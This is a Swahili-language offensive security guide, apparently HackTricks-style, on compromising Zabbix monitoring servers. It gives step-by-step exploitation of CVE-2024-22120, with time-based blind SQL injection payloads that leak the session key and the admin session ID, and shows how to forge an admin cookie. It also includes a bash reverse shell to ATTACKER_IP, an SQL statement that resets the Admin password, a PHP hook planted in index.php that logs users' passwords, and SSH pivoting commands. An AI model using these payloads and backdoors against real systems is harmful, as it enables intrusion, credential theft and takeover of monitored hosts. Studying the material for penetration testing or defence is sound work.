Zabbix Usalama

Reading time: 7 minutes

Muhtasari

Zabbix ni jukwaa la ufuatiliaji linaloonyesha web UI (kawaida nyuma ya Apache/Nginx) na kipengele cha server kinachozungumza pia protocol ya Zabbix kwa TCP/10051 (server/trapper) na agent kwa TCP/10050. Wakati wa engagements unaweza kukutana na:

• Web UI: HTTP(S) virtual host like zabbix.example.tld
• Zabbix server port: 10051/tcp (JSON over a ZBXD header framing)
• Zabbix agent port: 10050/tcp

Muundo wa cookie muhimu: zbx_session ni Base64 ya compact JSON object ambayo inajumuisha angalau sessionid, serverCheckResult, serverCheckTime na sign. sign ni HMAC ya JSON payload.

Ndani za cookie zbx_session

Matoleo ya hivi karibuni ya Zabbix huhesabu cookie kama ifuatavyo:

• data JSON: {"sessionid":"<32-hex>","serverCheckResult":true,"serverCheckTime":<unix_ts>}
• sign: HMAC-SHA256(key=session_key, data=JSON string of data sorted by keys and compact separators)
• Final cookie: Base64(JSON_with_sign)

Ikiwa unaweza kupata global session_key na sessionid halali ya Admin, unaweza kutengeneza cookie halali ya Admin offline na ku-authenticate kwenye UI.

CVE-2024-22120 — Time-based blind SQLi kwenye audit log ya Zabbix Server

Matoleo yaliyoathiriwa (kama ilivyodokumentiwa hadharani):

• 6.0.0–6.0.27, 6.4.0–6.4.12, 7.0.0alpha1

Muhtasari wa udhaifu:

• Wakati utekelezaji wa Script unarekodiwa kwenye audit log ya Zabbix Server, field ya clientip haisafishwi na huunganishwa ndani ya SQL, kuruhusu time-based blind SQLi kupitia kipengele cha server.
• Hii inaweza kutumiwa kwa kutuma ombi la "command" lililotengenezwa kwa port ya Zabbix server 10051 kwa kutumia sessionid halali ya low-privileged, hostid ambayo mtumiaji anaweza kufikia, na scriptid iliyoruhusiwa.

Masharti ya awali na vidokezo vya kugundua:

• sessionid: Kutoka guest/login kwenye web UI, decode zbx_session (Base64) ili kupata sessionid.
• hostid: Angalia kupitia maombi ya web UI (e.g., Monitoring → Hosts) au zuia kwa proxy; default ya kawaida ni 10084.
• scriptid: Ni scripts pekee zilizoidhinishwa kwa role ya sasa zitakazoendeshwa; thibitisha kwa kuchunguza menyu ya script/majibu ya AJAX. Defaults kama 1 au 2 mara nyingi zinaruhusiwa; 3 inaweza kukataliwa.

Mtiririko wa exploitation

1. Chochea audit insert na SQLi katika clientip

• Unganisha kwenye TCP/10051 na tuma Zabbix framed message na request="command" ukijumuisha sid, hostid, scriptid, na clientip imewekwa kuwa expression ya SQL ambayo server itaiunganisha na kuitathmini.

Sehemu za chini kabisa za ujumbe (mwili wa JSON):

{
"request": "command",
"sid": "<low-priv-sessionid>",
"scriptid": "1",
"clientip": "' + (SQL_PAYLOAD) + '",
"hostid": "10084"
}

Muundo kamili wa wire ni: "ZBXD\x01" + 8-byte little-endian length + UTF-8 JSON. Unaweza kutumia pwntools au socket code yako mwenyewe kuifrema.

2. Time-bruteforce secrets via conditional sleep

Tumia conditional expressions ku-leak hex-encoded secrets herufi moja kwa wakati kwa kupima response time. Mifano ambayo imefanya kazi kwa vitendo:

• Leak global session_key from config:

(select CASE WHEN (ascii(substr((select session_key from config),{pos},1))={ord}) THEN sleep({T_TRUE}) ELSE sleep({T_FALSE}) END)

• Leak Admin session_id (userid=1) kutoka sessions:

(select CASE WHEN (ascii(substr((select sessionid from sessions where userid=1 limit 1),{pos},1))={ord}) THEN sleep({T_TRUE}) ELSE sleep({T_FALSE}) END)

Maelezo:

• charset: 32 hex chars [0-9a-f]
• Chagua T_TRUE >> T_FALSE (mfano, 10 dhidi ya 1) na pima wall-clock kwa kila jaribio
• Hakikisha scriptid yako imeidhinishwa kwa mtumiaji; vinginevyo hakuna audit row itakayozalishwa na timing haitafanya kazi

3. Kutengeneza cookie ya Admin

Mara tu unapokuwa na:

• session_key: 32-hex kutoka config.session_key
• admin_sessionid: 32-hex kutoka sessions.sessionid kwa userid=1

Hesabu:

• sign = HMAC_SHA256(key=session_key, data=json.dumps({sessionid, serverCheckResult:true, serverCheckTime:now}, sort by key, compact))
• zbx_session = Base64(JSON_with_sign)

Weka cookie zbx_session kwa thamani hii na fanya GET /zabbix.php?action=dashboard.view ili kuthibitisha ufikiaji wa Admin.

Zana tayari

• Public PoC inatoa otomatiki: bruteforce ya session_key na admin sessionid, na cookie forging; inahitaji pwntools na requests.
• Vigezo vinavyotolewa kawaida ni pamoja na: --ip (FQDN of UI), --port 10051, --sid (low-priv), --hostid, na hiari --admin-sid inayojulikana ili kuepuka brute.

RCE via Script execution (post-Admin)

Ukisha pata ufikiaji wa Admin kwenye UI, unaweza kutekeleza Scripts zilizotangulia dhidi ya monitored hosts. Iwapo agents/hosts zitatekeleza amri za script kwa ndani, hii itasababisha code execution kwenye mifumo hiyo (mara nyingi kama zabbix user kwenye Linux hosts):

• Ukaguzi wa haraka: run id ili kuthibitisha muktadha wa mtumiaji
• Mfano wa Reverse shell:

bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1'

Kuboresha TTY (Linux):

script /dev/null -c bash
# background with Ctrl+Z, then on attacker terminal:
stty raw -echo; fg
reset

Ikiwa una access ya DB, mbadala wa kutengeneza cookie ni kuweka upya password ya Admin kwa bcrypt iliyodokumentiwa kwa "zabbix":

UPDATE users SET passwd='$2a$10$ZXIvHAEP2ZM.dLXTm6uPHOMVlARXX7cqjbhM6Fn0cANzkCQBWpMrS' WHERE username='Admin';

Credential capture via login hook (post-exploitation)

Ikiwa kuandika faili kunawezekana kwenye seva ya UI ya wavuti, unaweza kwa muda kuongeza logging snippet kwenye /usr/share/zabbix/index.php, kando ya tawi la kuingia linalotegemea fomu, ili kunyakua maelezo ya kuingia:

// login via form
if (hasRequest('enter') && CWebUser::login(getRequest('name', ZBX_GUEST_USER), getRequest('password', ''))) {
$user = $_POST['name'] ?? '??';
$password = $_POST['password'] ?? '??';
$f = fopen('/dev/shm/creds.txt','a+'); fputs($f, "$user:$password\n"); fclose($f);
CSessionHelper::set('sessionid', CWebUser::$data['sessionid']);
}

Watumiaji wanathibitisha kawaida; soma /dev/shm/creds.txt baadaye. Ondoa hook ukimaliza.

Pivoting kwa huduma za ndani

Hata kama shell ya service account ni /usr/sbin/nologin, kuongeza entry kwenye SSH authorized_keys na kutumia -N -L kunaruhusu local port-forwarding kwa loopback-only services (e.g., CI/CD at 8111):

ssh -i key user@host -N -L 8111:127.0.0.1:8111

Tazama mifumo zaidi ya tunneling: Angalia Tunneling and Port Forwarding.

Vidokezo vya uendeshaji

• Thibitisha scriptid inaruhusiwa kwa nafasi ya sasa (guest anaweza kuwa na seti ndogo)
• Timing brute inaweza kuwa polepole; hifadhi (cache) sessionid ya admin uliopatikana na uitumie tena
• JSON iliyotumwa kwa 10051 lazima iwe na header ya ZBXD\x01 na urefu wa little-endian

Marejeleo

• HTB Watcher — Zabbix CVE-2024-22120 to Admin/RCE and TeamCity root pivot
• CVE-2024-22120-RCE toolkit (PoC scripts)